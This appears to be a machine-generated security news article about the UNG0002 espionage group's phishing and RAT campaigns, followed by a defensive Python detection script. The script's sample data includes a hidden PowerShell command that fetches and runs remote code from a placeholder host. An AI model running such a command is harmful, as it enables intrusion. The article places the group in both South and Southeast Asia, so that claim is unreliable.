Ethical Hacking News

A Sophisticated and Persistent Threat Entity from South Asia: The UNG0002 Group


A new threat actor has been identified by Seqrite Labs as responsible for a series of high-profile attacks targeting multiple sectors in China, Hong Kong, and Pakistan. Dubbed UNG0002, this group uses sophisticated tactics, including spear-phishing and post-exploitation frameworks, to deliver their payload. The attack chains involved LNK files masquerading as resumes, INET RAT, and Blister DLL loader, highlighting the group's adaptability and technical proficiency. Organizations operating in these jurisdictions must take immediate action to protect themselves against this threat entity.

  • The UNG0002 (Unknown Group 0002) group is a sophisticated threat entity from South Asia that has been actively engaged in a broader cyber espionage campaign, targeting multiple sectors in China, Hong Kong, and Pakistan.
  • The group uses shortcut files, VBScript, and post-exploitation tools like Cobalt Strike and Metasploit to deliver their payload, often deploying CV-themed decoy documents to lure victims into a trap.
  • Two major campaigns have been identified: Operation Cobalt Whisper and Operation AmberMist, both involving spear-phishing attacks and the deployment of post-exploitation frameworks.
  • The group uses a multi-stage infection process, deploying INET RAT and Blister DLL loader to establish contact with a remote server and execute Shadow RAT.
  • Alternate attack sequences have been detected using ClickFix tactics to launch PowerShell commands, which are used to execute Shadow RAT via DLL side-loading.
  • The group's high adaptability and technical proficiency, combined with their ability to evolve their toolset while maintaining consistent TTPs, make them a significant concern for organizations operating in targeted jurisdictions.
  • Implementing robust security measures such as multi-factor authentication, keeping software up-to-date, and conducting regular security audits is essential to protect against this threat entity.


    The cybersecurity landscape has been constantly evolving, with threat actors continuously adapting their tactics, techniques, and procedures (TTPs) to evade detection. Recently, Seqrite Labs researcher Subhajeet Singha shed light on a sophisticated and persistent threat entity from South Asia, tracked as UNG0002 (aka Unknown Group 0002). This group has been actively engaged in a broader cyber espionage campaign, targeting multiple sectors in China, Hong Kong, and Pakistan.

    The UNG0002 group's modus operandi (MO) revolves around using shortcut files (LNK), VBScript, and post-exploitation tools such as Cobalt Strike and Metasploit to deliver their payload. Consistently, they deploy CV-themed decoy documents to lure victims into a trap. This tactic is particularly noteworthy, as it demonstrates the group's sophisticated understanding of human psychology and their ability to craft convincing lures.

    The activity encompasses two major campaigns: Operation Cobalt Whisper and Operation AmberMist. Operation Cobalt Whisper took place between May and September 2024 and involved the use of ZIP archives propagated via spear-phishing attacks to deliver Cobalt Strike beacons, a post-exploitation framework, using LNK and Visual Basic Scripts as interim payloads. Seqrite Labs initially documented this campaign in late October 2024.

    The AmberMist attack chains have been found to leverage spear-phishing emails as a starting point to deliver LNK files masquerading as curriculum vitae and resumes. This multi-stage infection process results in the deployment of INET RAT and Blister DLL loader, which are used to execute Shadow RAT. The latter is capable of establishing contact with a remote server to await further commands.

    Alternate attack sequences detected in January 2025 have been found to redirect email recipients to fake landing pages spoofing Pakistan's Ministry of Maritime Affairs (MoMA) website. These fake CAPTCHA verification checks employ ClickFix tactics to launch PowerShell commands, which are used to execute Shadow RAT via DLL side-loading.

    The exact origins of the UNG0002 group remain unclear, but evidence points to it being an espionage-focused group from Southeast Asia. This group demonstrates high adaptability and technical proficiency, continuously evolving their toolset while maintaining consistent TTPs.

    The impact of this threat entity is significant, as it has been targeting multiple sectors in China, Hong Kong, and Pakistan. The group's ability to evolve its tactics and maintain a persistent presence is a serious concern for organizations operating in these jurisdictions.

    Furthermore, the use of post-exploitation frameworks such as Cobalt Strike and Metasploit by UNG0002 highlights the sophistication of this threat entity. These tools are commonly used by advanced persistent threats (APTs) to establish a foothold on compromised systems. The deployment of INET RAT and Blister DLL loader adds to the group's arsenal, providing them with additional tools for persistence and command and control.

    In light of this latest development, it is essential that organizations operating in China, Hong Kong, and Pakistan take immediate action to protect themselves against this threat entity. This includes implementing robust security measures such as multi-factor authentication, keeping software up-to-date, and conducting regular security audits.

    The cyber espionage landscape is constantly evolving, and threat actors are becoming increasingly sophisticated in their tactics. The UNG0002 group's activities serve as a reminder of the importance of staying vigilant and proactive in defending against cyber threats.
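    The AmberMist and ClickFix paragraphs above describe three host-side signals a defender can look for: shortcut (LNK) files dressed up as CVs or resumes, PowerShell launched through a ClickFix-style lure, and DLL side-loading. The following Python is an added, defender-side example, not code from the article or from Seqrite Labs. It assumes, as general knowledge about ClickFix lures rather than anything stated on this page, that the victim pastes the command into the Windows Run dialog, so the resulting powershell.exe appears with explorer.exe as its parent. Every file name, path and process event in it is constructed for illustration.

```python
"""Defender-side triage heuristics for the UNG0002 lure chain described above.
Added example; not code from the article or Seqrite Labs. All file names,
paths and process events below are constructed for illustration."""
import re
from dataclasses import dataclass

# --- 1. LNK files dressed up as CVs / resumes -----------------------------
CV_WORDS = ("cv", "resume", "curriculum")
DOC_EXTS = (".pdf", ".doc", ".docx")


def is_cv_themed_lnk(filename: str) -> bool:
    """Flag a Windows shortcut whose name suggests a CV or that fakes a
    document extension in front of .lnk (e.g. 'Resume_A_Khan.pdf.lnk')."""
    name = filename.lower()
    if not name.endswith(".lnk"):
        return False
    stem = name[:-len(".lnk")]
    return any(w in stem for w in CV_WORDS) or stem.endswith(DOC_EXTS)


# --- 2. ClickFix-style PowerShell launches ---------------------------------
@dataclass
class ProcEvent:
    parent: str   # parent process image path
    image: str    # child process image path
    cmdline: str  # child command line


# Assumption (general ClickFix knowledge, not stated on the page): the victim
# pastes the command into the Run dialog, so PowerShell is a child of explorer.exe.
SUSPICIOUS_PS = re.compile(
    r"-e(nc(odedcommand)?)?\s|"          # -e / -enc / -EncodedCommand
    r"-w(indowstyle)?\s+hidden|"          # hidden console window
    r"-e(p|xecutionpolicy)\s+bypass|"     # script policy bypass
    r"\b(iwr|iex|invoke-webrequest|invoke-expression|downloadstring)\b",
    re.IGNORECASE,
)


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def is_clickfix_like(ev: ProcEvent) -> bool:
    """PowerShell spawned directly by explorer.exe with download, hide or
    policy-bypass switches on its command line."""
    if _basename(ev.parent) != "explorer.exe":
        return False
    if _basename(ev.image) not in ("powershell.exe", "pwsh.exe"):
        return False
    return SUSPICIOUS_PS.search(ev.cmdline) is not None


# --- 3. DLL side-loading from user-writable directories --------------------
@dataclass
class ImageLoad:
    image: str   # executable that loaded the DLL
    loaded: str  # path of the loaded DLL


USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\",
                 "\\users\\public\\", "\\programdata\\")


def is_sideload_candidate(ev: ImageLoad) -> bool:
    """An executable in a user-writable directory loading a DLL that sits
    beside it. Noisy for self-contained apps installed under AppData, so
    treat this as a triage hint, not a verdict."""
    exe_dir = ev.image.lower().rsplit("\\", 1)[0] + "\\"
    dll_dir = ev.loaded.lower().rsplit("\\", 1)[0] + "\\"
    return exe_dir == dll_dir and any(m in exe_dir for m in USER_WRITABLE)


# --- constructed sample telemetry -------------------------------------------
SAMPLE_FILES = ["Resume_A_Khan.pdf.lnk", "quarterly_report.docx",
                "CV.lnk", "Shortcut to notes.lnk"]
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_PROCS = [
    ProcEvent(r"C:\Windows\explorer.exe", PS,
              'powershell.exe -w hidden -ep bypass -c "iex (iwr http://example.invalid/v)"'),
    ProcEvent(r"C:\Windows\explorer.exe", PS, "powershell.exe Get-Process"),
    ProcEvent(r"C:\Program Files\Editor\editor.exe", PS,
              "powershell.exe -NoProfile -ep bypass -File build.ps1"),
]
SAMPLE_LOADS = [
    ImageLoad(r"C:\Users\u\AppData\Local\Temp\viewer.exe",
              r"C:\Users\u\AppData\Local\Temp\helper.dll"),
    ImageLoad(r"C:\Windows\System32\svchost.exe",
              r"C:\Windows\System32\helper.dll"),
]


def triage(files, procs, loads) -> dict:
    """Return the items each heuristic flags, keyed by heuristic name."""
    return {
        "cv_lnk": [f for f in files if is_cv_themed_lnk(f)],
        "clickfix": [p.cmdline for p in procs if is_clickfix_like(p)],
        "sideload": [ld.image for ld in loads if is_sideload_candidate(ld)],
    }


if __name__ == "__main__":
    for name, hits in triage(SAMPLE_FILES, SAMPLE_PROCS, SAMPLE_LOADS).items():
        print(name, hits)
```

    On the constructed sample, only the first process event (explorer.exe spawning a hidden, policy-bypassing PowerShell that fetches and executes remote content) is flagged; the plain `Get-Process` launch and the build script started by an editor are not. The side-loading heuristic deliberately ignores the System32 case and flags only the executable and DLL pair living together under Temp. The ClickFix check does not catch variants that go through cmd.exe or mshta.exe rather than PowerShell directly, so it should sit alongside broader parent-child process rules rather than replace them.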



    Related Information:
  • https://www.ethicalhackingnews.com/articles/A-Sophisticated-and-Persistent-Threat-Entity-from-South-Asia-The-UNG0002-Group-ehn.shtml

  • https://thehackernews.com/2025/07/ung0002-group-hits-china-hong-kong.html


  • Published: Fri Jul 18 16:05:24 2025 by llama3.2 3B Q4_K_M

    © Ethical Hacking News. All rights reserved.